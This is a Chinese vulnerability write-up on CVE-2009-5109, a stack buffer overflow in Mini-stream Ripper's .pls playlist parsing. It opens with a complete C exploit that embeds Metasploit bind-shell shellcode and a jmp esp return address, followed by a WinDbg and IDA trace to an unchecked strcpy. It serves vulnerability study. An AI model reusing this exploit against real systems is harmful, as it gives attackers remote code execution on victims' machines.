首页 > 安全 > 网络安全 >

Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)

2017-02-20

Mini-STREAM RIPPER pls缓冲区溢出漏洞(CVE-2009-5109)。

Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)。

漏洞说明 软件下载: https://www.exploit-db.com/apps/ff609955485ea7bd71d403c330a946aa-Mini-streamRipper.exe PoC: #include #include #include /* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum http://metasploit.com */ unsigned char shell[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49""\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36""\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34""\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41""\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e""\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58""\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47""\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58""\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38""\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a""\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30""\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57""\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58""\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30""\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c""\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44""\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50""\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f""\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33""\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f""\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f""\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50""\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d""\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45""\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f""\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38""\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55""\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d""\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d""\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38""\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35""\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37""\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56""\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56""\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54""\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54""\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53""\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51""\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35""\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35""\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c""\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f""\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f""\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e""\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"; int main ( int argc , char * argv[]){ FILE* expfle= NULL; char* EIP = "\x53\x93\x42\x7e"; // jmp esp -> user32.dll int i; printf("\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\r\n"); printf("\t -------> now upload the .pls file to a remote server <-------\n");

if( (expfle=fopen("mini-stream-ripper.pls","wb")) ==NULL ) { perror("Cannot create the exploit file!!! :("); exit(0); } for (i=0; i<17405; i++) { fwrite("\x41", 1, 1, expfle); // Junk } fwrite(EIP, 4, 1, expfle); // ret for (i=0; i<10; i++) { fwrite("\x90", 1, 1, expfle); // Nop&#39;s } fwrite(shell, sizeof(shell), 1, expfle); // write the shell for (i=0; i<16702; i++) { fwrite("\xcc", 1, 1, expfle); // finish off buffer } fclose(expfle); printf("[+] mini-stream-ripper.pls Created successfully! \r\n"); printf("[+] Exploited by mr_me \r\n"); return 0; }调试环境: Windows xp sp3 这个PoC是C语言的,可以用VC6.0进行编译,同样会生成一个.pls文件,然后直接用Mini-stream RIPPER打开,就能够触发漏洞了,不过这个PoC包含shellcode,如果想正常引发crash的话,可以把相关的跳转,shellcode等部分的内容直接修改成畸形字符串,比如"\x41"即可。 漏洞复现 此漏洞是由于Ripper.exe对于.pls文件处理时,没有对文件内容的长度进行长度检查,从而在MSRfilter01.dll中处理文件时拷贝了异常字符串,导致了缓冲区溢出,当使用函数sub_42B840时,由于超长字符串覆盖了缓冲区,从而导致了漏洞的发生。 我们生成一个样本文件,打开ripper.exe,加载样本文件,附加windbg,到达漏洞现场。 0:010> g(304.e0): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0001021690909090 ?? ???这时我们使用kb回溯堆栈调用。 0:000> kbChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong.000f7294 90909090 90909090 90909090 41909090 0x90909090000fbfb4 00000000 00000000 00000000 00000000 0x90909090发现此时堆栈已经被完全破坏了,没法通过堆栈调用来回溯漏洞现场,我们重新观察poc,当程序打开时,应该会调用fopen,我们通过ida pro重新查找关键函数fopen,得到下面四处调用。 .text:0045B6F7 call ds:fopen.text:00446E37 call ds:fopen.text:00446232 call ds:fopen.text:00429636 call ds:fopen漏洞分析 我们在这四处调用下断点。 0:010> bp 0045B6F7*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe0:010> bp 00446E370:010> bp 004462320:010> bp 00429636重新加载程序,附加样本后程序在一处fopen中断,为了确认这处调用,我们直接继续运行,发现到达漏洞位置。

0:010> bl 0 e 0045b6f7 0001 (0001) 0:**** Ripper+0x5b6f7 1 e 00446e37 0001 (0001) 0:**** Ripper+0x46e37 2 e 00446232 0001 (0001) 0:**** Ripper+0x46232 3 e 00429636 0001 (0001) 0:**** Ripper+0x296360:010> gBreakpoint 3 hiteax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x29636:*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 00429636 ff15d4aa4600 call dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}0:000> g(108.7dc): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0001021690909090 ?? ???因此我们可以确定这处call调用是关键调用,我们重新附加,直接到达这处call fopen调用。 0:010> bp 00429636*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe0:010> gBreakpoint 0 hiteax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x29636:*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 00429636 ff15d4aa4600 call dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}0:000> dd esp000f7290 000fbbd4 0047f794 00000001 00000000这时我们看看fopen的第一个参数 0:000> dc poi(esp)000fbbd4 445c3a43 6d75636f 73746e65 646e6120 C:\Documents and000fbbe4 74655320 676e6974 64415c73 696e696d Settings\Admini000fbbf4 61727473 5c726f74 73617263 702e3268 strator\crash2.p000fbc04 0000736c 00000014 00000001 00000000 ls确实是打开样本文件的操作,接下来,我们进行单步跟进。 0:000> peax=00000001 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=00429856 esp=000f7294 ebp=000fbfb4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206Ripper+0x29856:00429856 e8e51f0000 call Ripper+0x2b840 (0042b840)到达这个位置的时候,单步步过,漏洞被触发,我们查看一下,其实是在这个函数的一个分支逻辑。 mov ecx, ebpmov dword_4BB364, 2call sub_4208E0push ebx ; ArgListmov ecx, ebpcall sub_42B840在进入这个call调用时,我们来查看一下它的参数,首先来看看这个函数定义。 signed int __userpurge sub_42B840(int a1, const char *ArgList)定义了一个指针,和一个整数变量,这个指针实际上是文件路径。 0:000> dd esp000f7294 000fbbd4 000000010:000> dc poi(esp)000fbbd4 445c3a43 6d75636f 73746e65 646e6120 C:\Documents and000fbbe4 74655320 676e6974 64415c73 696e696d Settings\Admini000fbbf4 61727473 5c726f74 73617263 702e3268 strator\crash2.p000fbc04 0000736c 00000014 00000001 00000000 ls我们进入这个函数,单步跟踪,在即将到达ret的时候,我们看到了如下指令,以及内存变化。 eax=00000000 ebx=00000000 ecx=00000461 edx=000008c3 esi=00000001 edi=00f056f8

eip=0042ba8b esp=000ee94c ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba8b:0042ba8b 8b8c2438890000 mov ecx,dword ptr [esp+8938h] ss:0023:000f7284=b87b41410:000> dd esp+8938000f7284 b87b4141 45530146 ffffffff 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141000f72d4 41414141 41414141 41414141 41414141000f72e4 41414141 41414141 41414141 41414141可以看到此时esp对应地址已经被畸形字符串覆盖了,那么接下来。 0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=00f056f8eip=0042ba92 esp=000ee94c ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba92:0042ba92 5f pop edi0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=000066c3eip=0042ba93 esp=000ee950 ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba93:0042ba93 5e pop esi0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba94 esp=000ee954 ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba94:0042ba94 5d pop ebp0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba95 esp=000ee958 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba95:0042ba95 5b pop ebx0:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba96 esp=000ee95c ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba96:0042ba96 64890d00000000 mov dword ptr fs:[0],ecx fs:003b:00000000=000f72840:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba9d esp=000ee95c ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba9d:0042ba9d 81c434890000 add esp,8934h0:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042baa3 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216Ripper+0x2baa3:0042baa3 c20400 ret 40:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0000021690909090 ?? ???连续的pop之后,栈退出,返回后指向了90909090这个地址,可控,从而能达到控制eip执行任意代码的目的。 那么我们需要知道何时栈被畸形字符串覆盖,但是经过分析sub_42B840这个函数内部很大,我们需要快速定位到内存被覆盖的时刻,这样我们可以使用ba命令,在存在问题的位置下断点,首先我们进入这个函数时,可以观察内存空间。 0:000> p

eax=00008928 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=0042b85a esp=000f7284 ebp=000fbfb4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206Ripper+0x2b85a:0042b85a e8f1600300 call Ripper+0x61950 (00461950)0:000> peax=0042b85f ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=0042b85f esp=000ee95c ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2b85f:0042b85f 53 push ebx0:000> dd esp+8938000f7294 000fbbd4 00000001 00000000 7d647c29000f72a4 00a00054 00000000 00000000 00000000000f72b4 00000000 00000000 00000000 00000000000f72c4 00000000 00000000 00000000 00000000000f72d4 00000000 00000000 00000000 00000000000f72e4 00000000 00000000 00000000 00000000000f72f4 00000000 00000000 00000000 00000000000f7304 00000000 00000000 00000000 00000000此时esp对应位置存放的还是传入参数,这样我们在000f7294的位置下内存写入断点。 0:000> ba w1 000f72940:000> bl 0 e 00429856 0001 (0001) 0:**** Ripper+0x29856 1 e 000f7294 w 1 0001 (0001) 0:**** 0:000> gBreakpoint 1 hiteax=00000000 ebx=00000000 ecx=00000033 edx=000066ec esi=02ed3548 edi=000f72a4eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll - MSRfilter01!Playlist_FindNextItem+0x53:1000b5e3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]执行到这一步的时候可以看一下对应位置发生了什么变化。 0:000> peax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x55:1000b5e5 8bca mov ecx,edx0:000> dd 000f7284000f7284 b87b4141 45530146 90905958 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141000f72d4 41414141 41414141 41414141 41414141000f72e4 41414141 41414141 41414141 41414141那么可以看到此时内存已经被覆盖了,那么我们需要再次回溯,看看000f7294到底是什么原因被修改的。 这个函数处于MSRfilter01.dll中,我们重新来看一下这个函数的过程。 signed int __cdecl Playlist_FindNextItem(char *a1){ const char *v1; // eax@1 signed int result; // eax@2 sub_1000B630( 5, "Debug: Playlist_FindNextItem enter. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c"); v1 = (const char *)sub_10008CC0(dword_10063BA0, 1); if ( v1 ) { strcpy(a1, v1); sub_1000B630( 5, "Debug: Playlist_FindNextItem ok. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c"); result = 1; } else { sub_1000B630( 5, "Debug: Playlist_FindNextItem NO File return. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");

result = 0; } return result;}可以看到,在v1是eax,而eax正是存放存在漏洞的寄存器,而sub_10008CC0用于获取漏洞指针的值,随后strcpy会将v1拷贝到a1指针中,而就是这个操作没有进行长度检查,导致超长串拷入时会冲垮下面栈中的内容。 这一步可以看到eax经过call函数调用后会被赋予异常串的值 0:010> gBreakpoint 0 hiteax=00ee0878 ebx=00000000 ecx=7c93003d edx=00000020 esi=000fbc07 edi=000f50b7eip=1000b5ae esp=000ee92c ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x1e:1000b5ae e80dd7ffff call MSRfilter01+0x8cc0 (10008cc0)0:000> dd 000f7284000f7284 000fbd48 004650db ffffffff 0042985b000f7294 000fbbd4 00000001 00000000 7d647c29000f72a4 00a00054 00000000 00000000 00000000000f72b4 00000000 00000000 00000000 00000000000f72c4 00000000 00000000 00000000 00000000000f72d4 00000000 00000000 00000000 00000000000f72e4 00000000 00000000 00000000 00000000000f72f4 00000000 00000000 00000000 000000000:000> peax=02eccf28 ebx=00000000 ecx=00ee08c0 edx=00000000 esi=000fbc07 edi=000f50b7eip=1000b5b3 esp=000ee92c ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x23:1000b5b3 83c418 add esp,18h紧接着拷贝,造成栈被冲垮。 0:000> peax=00000000 ebx=00000000 ecx=000019bb edx=000066ec esi=02eccf28 edi=000f0c84eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x53:1000b5e3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]0:000> dd 000f7284000f7284 000fbd48 004650db ffffffff 0042985b000f7294 000fbbd4 00000001 00000000 7d647c29000f72a4 00a00054 00000000 00000000 00000000000f72b4 00000000 00000000 00000000 00000000000f72c4 00000000 00000000 00000000 00000000000f72d4 00000000 00000000 00000000 00000000000f72e4 00000000 00000000 00000000 00000000000f72f4 00000000 00000000 00000000 000000000:000> peax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x55:1000b5e5 8bca mov ecx,edx0:000> dd 000f7284000f7284 b87b4141 45530146 90905958 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141

相关文章
最新文章
热点推荐